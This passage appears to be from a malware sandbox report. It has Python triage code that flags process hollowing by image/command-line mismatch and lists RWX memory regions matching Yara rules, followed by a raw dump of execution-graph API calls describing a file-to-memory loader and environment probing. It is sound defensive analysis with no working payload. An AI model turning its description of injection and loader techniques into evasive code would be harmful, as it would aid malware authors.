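    ProcEntry(10, r"C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe",
              r'"C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe"',
              ["0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp"]),
    ProcEntry(12, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory protection constant


def cmdline_image(cmdline):
    """First token of a Windows command line, surrounding quotes removed."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    return m.group(1) or m.group(2)


def hollowing_suspects(procs):
    """Target IDs whose on-disk image name differs from the command-line image name.

    The comparison is case-insensitive: Target 12 is firefox.exe on disk and
    Firefox.exe on the command line, which is normal. svchost.exe carrying
    VSP469620.exe's command line is the replaced-image (hollowing) signature.
    """
    out = []
    for p in procs:
        disk = PureWindowsPath(p.path).name.lower()
        cmd = PureWindowsPath(cmdline_image(p.cmdline)).name.lower()
        if disk != cmd:
            out.append(p.target_id)
    return out


def parse_dump_name(name):
    """Split a sandbox memory-dump file name into the fields used here.

    Field layout is an assumption drawn from the names above: target ID,
    sequence number, internal ID, region base address, page protection,
    further flags; every field is hexadecimal.
    """
    f = name.split(".")
    return {"target": int(f[0], 16), "base": int(f[3], 16), "protect": int(f[4], 16)}


def rwx_yara_regions(procs):
    """Per target, base addresses of Yara-matching regions mapped RWX."""
    result = {}
    for p in procs:
        bases = [hex(d["base"]) for d in map(parse_dump_name, p.yara_sources)
                 if d["protect"] == PAGE_EXECUTE_READWRITE]
        if bases:
            result[p.target_id] = bases
    return result


def triage(procs):
    """Combine both checks into one verdict per target."""
    hollow = set(hollowing_suspects(procs))
    rwx = rwx_yara_regions(procs)
    return {p.target_id: {"hollowed": p.target_id in hollow,
                          "rwx_yara_regions": rwx.get(p.target_id, [])}
            for p in procs}
```

Run triage(PROCS) to get the per-target view. Only Target 4 trips the image/command-line check; Targets 6, 7 and 10 show no mismatch because the injected code there arrived through the thread-injection and foreign-memory writes the signature list records, not through image replacement, so the RWX Yara regions are the only process-level trace of them.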

                                                              Execution Graph

                                                              Execution Coverage:4.3%
                                                              Dynamic/Decrypted Code Coverage:1.2%
                                                              Signature Coverage:7%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:149
                                                              execution_graph: interactive graph widget; its serialized node and edge data is not reproduced here. What is recoverable from it:
                                                              - A routine at 0xe87xxx-0xe88xxx, well above the 0xab0000 image base of Target ID 2 and therefore most likely in the dynamic/decrypted code counted in the coverage figures above, that locates modules via the PEB (GetPEB), then CreateFileW, VirtualAlloc, ReadFile, a second VirtualAlloc, VirtualFree and CloseHandle (a file-to-memory loader sequence), plus a separate Sleep node.
                                                              - Inside the image (0xab...., 0xad...., 0xaf...., 0xb2....): CRT startup and teardown (GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetStdHandle, GetFileType, RtlAllocateHeap, RtlFreeHeap, GetLastError, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, GetCurrentProcess, TerminateProcess, GetModuleHandleExW, GetProcAddress, ExitProcess, RaiseException).
                                                              - Environment probing: GetVersionExW, GetSystemInfo, GetNativeSystemInfo (resolved through LoadLibraryA / GetProcAddress / FreeLibrary), GetFullPathNameW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey.
                                                              - Window, timer and tray-icon handling: DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DestroyWindow, DeleteObject, DestroyIcon, LoadStringW, IsThemeActive, SystemParametersInfoW.
87756 ae375f 5 API calls ___raise_securityfailure 87753->87756 87755 ae3893 87755->87746 87756->87755 87757->87642 87759 ad7cf4 __lock 47 API calls 87758->87759 87760 ad1410 87759->87760 87823 ad7e58 LeaveCriticalSection 87760->87823 87762 ab3a88 87763 ad146d 87762->87763 87764 ad1477 87763->87764 87765 ad1491 87763->87765 87764->87765 87824 ad7c0e 47 API calls __getptd_noexit 87764->87824 87765->87650 87767 ad1481 87825 ad6e10 8 API calls ___strgtold12_l 87767->87825 87769 ad148c 87769->87650 87770->87652 87772 ab3d26 __ftell_nolock 87771->87772 87773 abd7f7 48 API calls 87772->87773 87774 ab3d31 GetCurrentDirectoryW 87773->87774 87826 ab61ca 87774->87826 87776 ab3d57 IsDebuggerPresent 87777 b21cc1 MessageBoxA 87776->87777 87778 ab3d65 87776->87778 87780 b21cd9 87777->87780 87778->87780 87781 ab3d82 87778->87781 87810 ab3e3a 87778->87810 87779 ab3e41 SetCurrentDirectoryW 87784 ab3e4e Mailbox 87779->87784 88002 acc682 48 API calls 87780->88002 87900 ab40e5 87781->87900 87784->87654 87785 b21ce9 87790 b21cff SetCurrentDirectoryW 87785->87790 87787 ab3da0 GetFullPathNameW 87788 ab6a63 48 API calls 87787->87788 87789 ab3ddb 87788->87789 87916 ab6430 87789->87916 87790->87784 87793 ab3df6 87794 ab3e00 87793->87794 88003 af71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 87793->88003 87932 ab3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 87794->87932 87798 b21d1c 87798->87794 87801 b21d2d 87798->87801 87800 ab3e0a 87803 ab3e1f 87800->87803 87805 ab4ffc 67 API calls 87800->87805 87802 ab5374 50 API calls 87801->87802 87804 b21d35 87802->87804 87940 abe8d0 87803->87940 87807 abce19 48 API calls 87804->87807 87805->87803 87809 b21d42 87807->87809 87811 b21d49 87809->87811 87812 b21d6e 87809->87812 87810->87779 87814 ab518c 48 API calls 87811->87814 87815 ab518c 48 API calls 87812->87815 87816 b21d54 87814->87816 87817 b21d6a GetForegroundWindow ShellExecuteW 87815->87817 87818 ab510d 48 API calls 87816->87818 87821 b21d9e Mailbox 87817->87821 
87820 b21d61 87818->87820 87822 ab518c 48 API calls 87820->87822 87821->87810 87822->87817 87823->87762 87824->87767 87825->87769 88004 ace99b 87826->88004 87830 ab61eb 87831 ab5374 50 API calls 87830->87831 87832 ab61ff 87831->87832 87833 abce19 48 API calls 87832->87833 87834 ab620c 87833->87834 88021 ab39db 87834->88021 87836 ab6216 Mailbox 87837 ab6eed 48 API calls 87836->87837 87838 ab622b 87837->87838 88033 ab9048 87838->88033 87841 abce19 48 API calls 87842 ab6244 87841->87842 87843 abd6e9 55 API calls 87842->87843 87844 ab6254 Mailbox 87843->87844 87845 abce19 48 API calls 87844->87845 87846 ab627c 87845->87846 87847 abd6e9 55 API calls 87846->87847 87848 ab628f Mailbox 87847->87848 87849 abce19 48 API calls 87848->87849 87850 ab62a0 87849->87850 88036 abd645 87850->88036 87852 ab62b2 Mailbox 87853 abd7f7 48 API calls 87852->87853 87854 ab62c5 87853->87854 88046 ab63fc 87854->88046 87858 ab62df 87859 ab62e9 87858->87859 87860 b21c08 87858->87860 87861 ad0fa7 _W_store_winword 59 API calls 87859->87861 87862 ab63fc 48 API calls 87860->87862 87864 ab62f4 87861->87864 87863 b21c1c 87862->87863 87866 ab63fc 48 API calls 87863->87866 87864->87863 87865 ab62fe 87864->87865 87867 ad0fa7 _W_store_winword 59 API calls 87865->87867 87868 b21c38 87866->87868 87869 ab6309 87867->87869 87871 ab5374 50 API calls 87868->87871 87869->87868 87870 ab6313 87869->87870 87872 ad0fa7 _W_store_winword 59 API calls 87870->87872 87873 b21c5d 87871->87873 87874 ab631e 87872->87874 87875 ab63fc 48 API calls 87873->87875 87876 ab635f 87874->87876 87877 b21c86 87874->87877 87880 ab63fc 48 API calls 87874->87880 87879 b21c69 87875->87879 87876->87877 87878 ab636c 87876->87878 87881 ab6eed 48 API calls 87877->87881 87885 acc050 48 API calls 87878->87885 87882 ab6eed 48 API calls 87879->87882 87883 ab6342 87880->87883 87884 b21ca8 87881->87884 87886 b21c77 87882->87886 87887 ab6eed 48 API calls 87883->87887 87888 ab63fc 48 API calls 87884->87888 87889 ab6384 87885->87889 87890 ab63fc 48 
API calls 87886->87890 87891 ab6350 87887->87891 87892 b21cb5 87888->87892 88062 ac1b90 87889->88062 87890->87877 87894 ab63fc 48 API calls 87891->87894 87892->87892 87894->87876 87895 ab6394 87896 ac1b90 48 API calls 87895->87896 87898 ab63fc 48 API calls 87895->87898 87899 ab63d6 Mailbox 87895->87899 88078 ab6b68 48 API calls 87895->88078 87896->87895 87898->87895 87899->87776 87901 ab40f2 __ftell_nolock 87900->87901 87902 ab410b 87901->87902 87903 b2370e _memset 87901->87903 87904 ab660f 49 API calls 87902->87904 87905 b2372a GetOpenFileNameW 87903->87905 87906 ab4114 87904->87906 87908 b23779 87905->87908 88557 ab40a7 87906->88557 87910 ab6a63 48 API calls 87908->87910 87912 b2378e 87910->87912 87912->87912 87913 ab4129 88575 ab4139 87913->88575 87917 ab643d __ftell_nolock 87916->87917 88775 ab4c75 87917->88775 87919 ab6442 87920 ab3dee 87919->87920 88786 ab5928 87 API calls 87919->88786 87920->87785 87920->87793 87922 ab644f 87922->87920 88787 ab5798 89 API calls Mailbox 87922->88787 87924 ab6458 87924->87920 87925 ab645c GetFullPathNameW 87924->87925 87926 ab6a63 48 API calls 87925->87926 87927 ab6488 87926->87927 87928 ab6a63 48 API calls 87927->87928 87929 ab6495 87928->87929 87930 b25dcf _wcscat 87929->87930 87931 ab6a63 48 API calls 87929->87931 87931->87920 87933 ab3ed8 87932->87933 87934 b21cba 87932->87934 88835 ab4024 87933->88835 87938 ab3e05 87939 ab36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87938->87939 87939->87800 87941 abe8f6 87940->87941 88000 abe906 Mailbox 87940->88000 87943 abed52 87941->87943 87941->88000 87942 afcc5c 87 API calls 87942->88000 88966 ace3cd 332 API calls 87943->88966 87945 ab3e2a 87945->87810 88001 ab3847 Shell_NotifyIconW _memset 87945->88001 87947 abed63 87947->87945 87948 abed70 87947->87948 88968 ace312 332 API calls Mailbox 87948->88968 87949 abe94c PeekMessageW 87949->88000 87951 b2526e Sleep 87951->88000 87952 abed77 LockWindowUpdate DestroyWindow GetMessageW 87952->87945 87955 abeda9 87952->87955 
87953 abebc7 87953->87945 88967 ab2ff6 16 API calls 87953->88967 87956 b259ef TranslateMessage DispatchMessageW GetMessageW 87955->87956 87956->87956 87958 b25a1f 87956->87958 87958->87945 87959 abed21 PeekMessageW 87959->88000 87960 ab1caa 49 API calls 87960->88000 87961 acf4ea 48 API calls 87961->88000 87962 abebf7 timeGetTime 87962->88000 87964 ab6eed 48 API calls 87964->88000 87965 b25557 WaitForSingleObject 87968 b25574 GetExitCodeProcess CloseHandle 87965->87968 87965->88000 87966 abed3a TranslateMessage DispatchMessageW 87966->87959 87967 b2588f Sleep 87996 b25429 Mailbox 87967->87996 87968->88000 87969 abd7f7 48 API calls 87969->87996 87970 abedae timeGetTime 88969 ab1caa 49 API calls 87970->88969 87972 b25733 Sleep 87972->87996 87975 acdc38 timeGetTime 87975->87996 87976 b25926 GetExitCodeProcess 87980 b25952 CloseHandle 87976->87980 87981 b2593c WaitForSingleObject 87976->87981 87978 ab2aae 308 API calls 87978->88000 87979 b25445 Sleep 87979->88000 87980->87996 87981->87980 87981->88000 87982 b25432 Sleep 87982->87979 87983 b18c4b 109 API calls 87983->87996 87984 ab2c79 108 API calls 87984->87996 87986 b259ae Sleep 87986->88000 87989 abce19 48 API calls 87989->87996 87992 abd6e9 55 API calls 87992->87996 87996->87969 87996->87975 87996->87976 87996->87979 87996->87982 87996->87983 87996->87984 87996->87986 87996->87989 87996->87992 87996->88000 88971 af4cbe 49 API calls Mailbox 87996->88971 88972 ab1caa 49 API calls 87996->88972 88973 ab2aae 332 API calls 87996->88973 89003 b0ccb2 50 API calls 87996->89003 89004 af7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 87996->89004 89005 af6532 63 API calls 3 library calls 87996->89005 87998 abce19 48 API calls 87998->88000 87999 abd6e9 55 API calls 87999->88000 88000->87942 88000->87949 88000->87951 88000->87953 88000->87959 88000->87960 88000->87961 88000->87962 88000->87964 88000->87965 88000->87966 88000->87967 88000->87970 88000->87972 88000->87978 88000->87979 
88000->87996 88000->87998 88000->87999 88840 abef00 88000->88840 88847 abf110 88000->88847 88912 ac45e0 88000->88912 88929 ace244 88000->88929 88934 acdc5f 88000->88934 88939 abeed0 332 API calls Mailbox 88000->88939 88940 ac3200 88000->88940 88970 b18d23 48 API calls 88000->88970 88974 abfe30 88000->88974 88001->87810 88002->87785 88003->87798 88005 abd7f7 48 API calls 88004->88005 88006 ab61db 88005->88006 88007 ab6009 88006->88007 88008 ab6016 __ftell_nolock 88007->88008 88009 ab6a63 48 API calls 88008->88009 88013 ab617c Mailbox 88008->88013 88011 ab6048 88009->88011 88019 ab607e Mailbox 88011->88019 88079 ab61a6 88011->88079 88012 ab614f 88012->88013 88014 abce19 48 API calls 88012->88014 88013->87830 88016 ab6170 88014->88016 88015 abce19 48 API calls 88015->88019 88018 ab64cf 48 API calls 88016->88018 88017 ab61a6 48 API calls 88017->88019 88018->88013 88019->88012 88019->88013 88019->88015 88019->88017 88020 ab64cf 48 API calls 88019->88020 88020->88019 88082 ab41a9 88021->88082 88024 ab3a06 88024->87836 88027 b22ff0 88029 ad1c9d _free 47 API calls 88027->88029 88030 b22ffd 88029->88030 88031 ab4252 84 API calls 88030->88031 88032 b23006 88031->88032 88032->88032 88034 acf4ea 48 API calls 88033->88034 88035 ab6237 88034->88035 88035->87841 88037 abd654 88036->88037 88044 abd67e 88036->88044 88038 abd65b 88037->88038 88041 abd6c2 88037->88041 88039 abd666 88038->88039 88045 abd6ab 88038->88045 88549 abd9a0 53 API calls __cinit 88039->88549 88041->88045 88551 acdce0 53 API calls 88041->88551 88044->87852 88045->88044 88550 acdce0 53 API calls 88045->88550 88047 ab641f 88046->88047 88048 ab6406 88046->88048 88050 ab6a63 48 API calls 88047->88050 88049 ab6eed 48 API calls 88048->88049 88051 ab62d1 88049->88051 88050->88051 88052 ad0fa7 88051->88052 88053 ad1028 88052->88053 88054 ad0fb3 88052->88054 88554 ad103a 59 API calls 4 library calls 88053->88554 88061 ad0fd8 88054->88061 88552 ad7c0e 47 API calls __getptd_noexit 88054->88552 88057 ad1035 88057->87858 
88058 ad0fbf 88553 ad6e10 8 API calls ___strgtold12_l 88058->88553 88060 ad0fca 88060->87858 88061->87858 88063 ac1cf6 88062->88063 88065 ac1ba2 88062->88065 88063->87895 88064 ac1bae 88069 ac1bb9 88064->88069 88556 acc15c 48 API calls 88064->88556 88065->88064 88067 acf4ea 48 API calls 88065->88067 88068 b249c4 88067->88068 88071 acf4ea 48 API calls 88068->88071 88070 ac1c5d 88069->88070 88072 acf4ea 48 API calls 88069->88072 88070->87895 88077 b249cf 88071->88077 88073 ac1c9f 88072->88073 88074 ac1cb2 88073->88074 88555 ab2925 48 API calls 88073->88555 88074->87895 88076 acf4ea 48 API calls 88076->88077 88077->88064 88077->88076 88078->87895 88080 abbdfa 48 API calls 88079->88080 88081 ab61b1 88080->88081 88081->88011 88147 ab4214 88082->88147 88087 b24f73 88090 ab4252 84 API calls 88087->88090 88088 ab41d4 LoadLibraryExW 88157 ab4291 88088->88157 88092 b24f7a 88090->88092 88093 ab4291 3 API calls 88092->88093 88095 b24f82 88093->88095 88183 ab44ed 88095->88183 88096 ab41fb 88096->88095 88097 ab4207 88096->88097 88099 ab4252 84 API calls 88097->88099 88101 ab39fe 88099->88101 88101->88024 88106 afc396 88101->88106 88103 b24fa9 88191 ab4950 88103->88191 88105 b24fb6 88107 ab4517 83 API calls 88106->88107 88108 afc405 88107->88108 88369 afc56d 88108->88369 88111 ab44ed 64 API calls 88112 afc432 88111->88112 88113 ab44ed 64 API calls 88112->88113 88114 afc442 88113->88114 88115 ab44ed 64 API calls 88114->88115 88116 afc45d 88115->88116 88117 ab44ed 64 API calls 88116->88117 88118 afc478 88117->88118 88119 ab4517 83 API calls 88118->88119 88120 afc48f 88119->88120 88121 ad395c __crtGetStringTypeA_stat 47 API calls 88120->88121 88122 afc496 88121->88122 88123 ad395c __crtGetStringTypeA_stat 47 API calls 88122->88123 88124 afc4a0 88123->88124 88125 ab44ed 64 API calls 88124->88125 88126 afc4b4 88125->88126 88127 afbf5a GetSystemTimeAsFileTime 88126->88127 88128 afc4c7 88127->88128 88129 afc4dc 88128->88129 88130 afc4f1 88128->88130 88131 ad1c9d _free 47 API calls 
88129->88131 88132 afc4f7 88130->88132 88133 afc556 88130->88133 88134 afc4e2 88131->88134 88375 afb965 88132->88375 88136 ad1c9d _free 47 API calls 88133->88136 88137 ad1c9d _free 47 API calls 88134->88137 88139 afc41b 88136->88139 88137->88139 88139->88027 88141 ab4252 88139->88141 88140 ad1c9d _free 47 API calls 88140->88139 88142 ab425c 88141->88142 88143 ab4263 88141->88143 88144 ad35e4 __fcloseall 83 API calls 88142->88144 88145 ab4283 FreeLibrary 88143->88145 88146 ab4272 88143->88146 88144->88143 88145->88146 88146->88027 88196 ab4339 88147->88196 88150 ab423c 88152 ab41bb 88150->88152 88153 ab4244 FreeLibrary 88150->88153 88154 ad3499 88152->88154 88153->88152 88204 ad34ae 88154->88204 88156 ab41c8 88156->88087 88156->88088 88283 ab42e4 88157->88283 88161 ab41ec 88164 ab4380 88161->88164 88162 ab42c1 FreeLibrary 88162->88161 88163 ab42b8 88163->88161 88163->88162 88165 acf4ea 48 API calls 88164->88165 88166 ab4395 88165->88166 88167 ab47b7 48 API calls 88166->88167 88168 ab43a1 _memcpy_s 88167->88168 88169 ab43dc 88168->88169 88170 ab4499 88168->88170 88171 ab44d1 88168->88171 88172 ab4950 57 API calls 88169->88172 88291 ab406b CreateStreamOnHGlobal 88170->88291 88302 afc750 93 API calls 88171->88302 88180 ab43e5 88172->88180 88175 ab44ed 64 API calls 88175->88180 88176 ab4479 88176->88096 88178 b24ed7 88179 ab4517 83 API calls 88178->88179 88181 b24eeb 88179->88181 88180->88175 88180->88176 88180->88178 88297 ab4517 88180->88297 88182 ab44ed 64 API calls 88181->88182 88182->88176 88184 ab44ff 88183->88184 88187 b24fc0 88183->88187 88326 ad381e 88184->88326 88188 afbf5a 88346 afbdb4 88188->88346 88190 afbf70 88190->88103 88192 b25002 88191->88192 88193 ab495f 88191->88193 88351 ad3e65 88193->88351 88195 ab4967 88195->88105 88200 ab434b 88196->88200 88199 ab4321 LoadLibraryA GetProcAddress 88199->88150 88201 ab422f 88200->88201 88202 ab4354 LoadLibraryA 88200->88202 88201->88150 88201->88199 88202->88201 88203 ab4365 GetProcAddress 88202->88203 88203->88201 
88206 ad34ba _fseek 88204->88206 88205 ad34cd 88252 ad7c0e 47 API calls __getptd_noexit 88205->88252 88206->88205 88209 ad34fe 88206->88209 88208 ad34d2 88253 ad6e10 8 API calls ___strgtold12_l 88208->88253 88223 ade4c8 88209->88223 88212 ad3503 88213 ad350c 88212->88213 88214 ad3519 88212->88214 88254 ad7c0e 47 API calls __getptd_noexit 88213->88254 88216 ad3543 88214->88216 88217 ad3523 88214->88217 88237 ade5e0 88216->88237 88255 ad7c0e 47 API calls __getptd_noexit 88217->88255 88222 ad34dd _fseek @_EH4_CallFilterFunc@8 88222->88156 88224 ade4d4 _fseek 88223->88224 88225 ad7cf4 __lock 47 API calls 88224->88225 88226 ade4e2 88225->88226 88227 ade559 88226->88227 88233 ad7d7c __mtinitlocknum 47 API calls 88226->88233 88235 ade552 88226->88235 88260 ad4e5b 48 API calls __lock 88226->88260 88261 ad4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 88226->88261 88262 ad69d0 47 API calls __crtGetStringTypeA_stat 88227->88262 88230 ade560 88231 ade56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 88230->88231 88230->88235 88231->88235 88232 ade5cc _fseek 88232->88212 88233->88226 88257 ade5d7 88235->88257 88245 ade600 __wopenfile 88237->88245 88238 ade61a 88267 ad7c0e 47 API calls __getptd_noexit 88238->88267 88240 ade61f 88268 ad6e10 8 API calls ___strgtold12_l 88240->88268 88242 ade838 88264 ae63c9 88242->88264 88243 ad354e 88256 ad3570 LeaveCriticalSection LeaveCriticalSection _fseek 88243->88256 88245->88238 88251 ade7d5 88245->88251 88269 ad185b 59 API calls 3 library calls 88245->88269 88247 ade7ce 88247->88251 88270 ad185b 59 API calls 3 library calls 88247->88270 88249 ade7ed 88249->88251 88271 ad185b 59 API calls 3 library calls 88249->88271 88251->88238 88251->88242 88252->88208 88253->88222 88254->88222 88255->88222 88256->88222 88263 ad7e58 LeaveCriticalSection 88257->88263 88259 ade5de 88259->88232 88260->88226 88261->88226 88262->88230 88263->88259 88272 ae5bb1 88264->88272 88266 ae63e2 88266->88243 88267->88240 88268->88243 88269->88247 
88270->88249 88271->88251 88273 ae5bbd _fseek 88272->88273 88274 ae5bcf 88273->88274 88277 ae5c06 88273->88277 88275 ad7c0e _free 47 API calls 88274->88275 88276 ae5bd4 88275->88276 88278 ad6e10 ___strgtold12_l 8 API calls 88276->88278 88279 ae5c78 __wsopen_helper 110 API calls 88277->88279 88280 ae5bde _fseek 88278->88280 88281 ae5c23 88279->88281 88280->88266 88282 ae5c4c __wsopen_helper LeaveCriticalSection 88281->88282 88282->88280 88287 ab42f6 88283->88287 88286 ab42cc LoadLibraryA GetProcAddress 88286->88163 88288 ab42aa 88287->88288 88289 ab42ff LoadLibraryA 88287->88289 88288->88163 88288->88286 88289->88288 88290 ab4310 GetProcAddress 88289->88290 88290->88288 88292 ab4085 FindResourceExW 88291->88292 88296 ab40a2 88291->88296 88293 b24f16 LoadResource 88292->88293 88292->88296 88294 b24f2b SizeofResource 88293->88294 88293->88296 88295 b24f3f LockResource 88294->88295 88294->88296 88295->88296 88296->88169 88298 ab4526 88297->88298 88301 b24fe0 88297->88301 88303 ad3a8d 88298->88303 88300 ab4534 88300->88180 88302->88169 88304 ad3a99 _fseek 88303->88304 88305 ad3aa7 88304->88305 88307 ad3acd 88304->88307 88316 ad7c0e 47 API calls __getptd_noexit 88305->88316 88318 ad4e1c 88307->88318 88308 ad3aac 88317 ad6e10 8 API calls ___strgtold12_l 88308->88317 88311 ad3ad3 88324 ad39fe 81 API calls 3 library calls 88311->88324 88313 ad3ae2 88325 ad3b04 LeaveCriticalSection LeaveCriticalSection _fseek 88313->88325 88315 ad3ab7 _fseek 88315->88300 88316->88308 88317->88315 88319 ad4e2c 88318->88319 88320 ad4e4e EnterCriticalSection 88318->88320 88319->88320 88322 ad4e34 88319->88322 88321 ad4e44 88320->88321 88321->88311 88323 ad7cf4 __lock 47 API calls 88322->88323 88323->88321 88324->88313 88325->88315 88329 ad3839 88326->88329 88328 ab4510 88328->88188 88330 ad3845 _fseek 88329->88330 88331 ad3888 88330->88331 88333 ad385b _memset 88330->88333 88341 ad3880 _fseek 88330->88341 88332 ad4e1c __lock_file 48 API calls 88331->88332 88334 ad388e 88332->88334 88342 ad7c0e 
47 API calls __getptd_noexit 88333->88342 88344 ad365b 62 API calls 6 library calls 88334->88344 88337 ad3875 88343 ad6e10 8 API calls ___strgtold12_l 88337->88343 88338 ad38a4 88345 ad38c2 LeaveCriticalSection LeaveCriticalSection _fseek 88338->88345 88341->88328 88342->88337 88343->88341 88344->88338 88345->88341 88349 ad344a GetSystemTimeAsFileTime 88346->88349 88348 afbdc3 88348->88190 88350 ad3478 __aulldiv 88349->88350 88350->88348 88352 ad3e71 _fseek 88351->88352 88353 ad3e7f 88352->88353 88354 ad3e94 88352->88354 88365 ad7c0e 47 API calls __getptd_noexit 88353->88365 88356 ad4e1c __lock_file 48 API calls 88354->88356 88358 ad3e9a 88356->88358 88357 ad3e84 88366 ad6e10 8 API calls ___strgtold12_l 88357->88366 88367 ad3b0c 55 API calls 5 library calls 88358->88367 88361 ad3ea5 88368 ad3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 88361->88368 88362 ad3e8f _fseek 88362->88195 88364 ad3eb7 88364->88362 88365->88357 88366->88362 88367->88361 88368->88364 88374 afc581 __tzset_nolock _wcscmp 88369->88374 88370 ab44ed 64 API calls 88370->88374 88371 afc417 88371->88111 88371->88139 88372 afbf5a GetSystemTimeAsFileTime 88372->88374 88373 ab4517 83 API calls 88373->88374 88374->88370 88374->88371 88374->88372 88374->88373 88376 afb97e 88375->88376 88377 afb970 88375->88377 88379 afb9c3 88376->88379 88380 ad3499 117 API calls 88376->88380 88405 afb987 88376->88405 88378 ad3499 117 API calls 88377->88378 88378->88376 88406 afbbe8 64 API calls 3 library calls 88379->88406 88381 afb9a8 88380->88381 88381->88379 88383 afb9b1 88381->88383 88383->88405 88417 ad35e4 88383->88417 88384 afba07 88385 afba2c 88384->88385 88386 afba0b 88384->88386 88407 afb7e5 47 API calls __crtGetStringTypeA_stat 88385->88407 88389 afba18 88386->88389 88390 ad35e4 __fcloseall 83 API calls 88386->88390 88392 ad35e4 __fcloseall 83 API calls 88389->88392 88389->88405 88390->88389 88391 afba34 88393 afba5a 88391->88393 88394 afba3a 88391->88394 88392->88405 88408 afba8a 90 API calls 
88393->88408 88396 afba47 88394->88396 88398 ad35e4 __fcloseall 83 API calls 88394->88398 88399 ad35e4 __fcloseall 83 API calls 88396->88399 88396->88405 88397 afba61 88409 afbb64 88397->88409 88398->88396 88399->88405 88402 afba75 88404 ad35e4 __fcloseall 83 API calls 88402->88404 88402->88405 88403 ad35e4 __fcloseall 83 API calls 88403->88402 88404->88405 88405->88140 88406->88384 88407->88391 88408->88397 88410 afbb71 88409->88410 88413 afbb77 88409->88413 88411 ad1c9d _free 47 API calls 88410->88411 88411->88413 88412 afbb88 88415 afba68 88412->88415 88416 ad1c9d _free 47 API calls 88412->88416 88413->88412 88414 ad1c9d _free 47 API calls 88413->88414 88414->88412 88415->88402 88415->88403 88416->88415 88418 ad35f0 _fseek 88417->88418 88419 ad361c 88418->88419 88420 ad3604 88418->88420 88422 ad4e1c __lock_file 48 API calls 88419->88422 88426 ad3614 _fseek 88419->88426 88446 ad7c0e 47 API calls __getptd_noexit 88420->88446 88424 ad362e 88422->88424 88423 ad3609 88447 ad6e10 8 API calls ___strgtold12_l 88423->88447 88430 ad3578 88424->88430 88426->88405 88431 ad359b 88430->88431 88432 ad3587 88430->88432 88438 ad3597 88431->88438 88449 ad2c84 88431->88449 88489 ad7c0e 47 API calls __getptd_noexit 88432->88489 88434 ad358c 88490 ad6e10 8 API calls ___strgtold12_l 88434->88490 88448 ad3653 LeaveCriticalSection LeaveCriticalSection _fseek 88438->88448 88442 ad35b5 88466 ade9d2 88442->88466 88444 ad35bb 88444->88438 88445 ad1c9d _free 47 API calls 88444->88445 88445->88438 88446->88423 88447->88426 88448->88426 88450 ad2c97 88449->88450 88451 ad2cbb 88449->88451 88450->88451 88452 ad2933 __flush 47 API calls 88450->88452 88455 adeb36 88451->88455 88453 ad2cb4 88452->88453 88491 adaf61 88453->88491 88456 ad35af 88455->88456 88457 adeb43 88455->88457 88459 ad2933 88456->88459 88457->88456 88458 ad1c9d _free 47 API calls 88457->88458 88458->88456 88460 ad293d 88459->88460 88461 ad2952 88459->88461 88516 ad7c0e 47 API calls __getptd_noexit 88460->88516 88461->88442 88463 
ad2942 88517 ad6e10 8 API calls ___strgtold12_l 88463->88517 88465 ad294d 88465->88442 88467 ade9de _fseek 88466->88467 88468 ade9fe 88467->88468 88469 ade9e6 88467->88469 88471 adea7b 88468->88471 88476 adea28 88468->88476 88542 ad7bda 47 API calls __getptd_noexit 88469->88542 88546 ad7bda 47 API calls __getptd_noexit 88471->88546 88472 ade9eb 88543 ad7c0e 47 API calls __getptd_noexit 88472->88543 88475 adea80 88547 ad7c0e 47 API calls __getptd_noexit 88475->88547 88518 ada8ed 88476->88518 88479 adea2e 88482 adea4c 88479->88482 88483 adea41 88479->88483 88480 adea88 88548 ad6e10 8 API calls ___strgtold12_l 88480->88548 88544 ad7c0e 47 API calls __getptd_noexit 88482->88544 88527 adea9c 88483->88527 88486 adea47 88545 adea73 LeaveCriticalSection __unlock_fhandle 88486->88545 88487 ade9f3 _fseek 88487->88444 88489->88434 88490->88438 88492 adaf6d _fseek 88491->88492 88493 adaf75 88492->88493 88494 adaf8d 88492->88494 88496 ad7bda __free_osfhnd 47 API calls 88493->88496 88495 adb022 88494->88495 88499 adafbf 88494->88499 88497 ad7bda __free_osfhnd 47 API calls 88495->88497 88498 adaf7a 88496->88498 88500 adb027 88497->88500 88501 ad7c0e _free 47 API calls 88498->88501 88502 ada8ed ___lock_fhandle 49 API calls 88499->88502 88503 ad7c0e _free 47 API calls 88500->88503 88510 adaf82 _fseek 88501->88510 88504 adafc5 88502->88504 88505 adb02f 88503->88505 88506 adafd8 88504->88506 88507 adafeb 88504->88507 88508 ad6e10 ___strgtold12_l 8 API calls 88505->88508 88509 adb043 __chsize_nolock 75 API calls 88506->88509 88511 ad7c0e _free 47 API calls 88507->88511 88508->88510 88512 adafe4 88509->88512 88510->88451 88513 adaff0 88511->88513 88515 adb01a __flush LeaveCriticalSection 88512->88515 88514 ad7bda __free_osfhnd 47 API calls 88513->88514 88514->88512 88515->88510 88516->88463 88517->88465 88519 ada8f9 _fseek 88518->88519 88520 ada946 EnterCriticalSection 88519->88520 88521 ad7cf4 __lock 47 API calls 88519->88521 88522 ada96c _fseek 88520->88522 88523 ada91d 88521->88523 
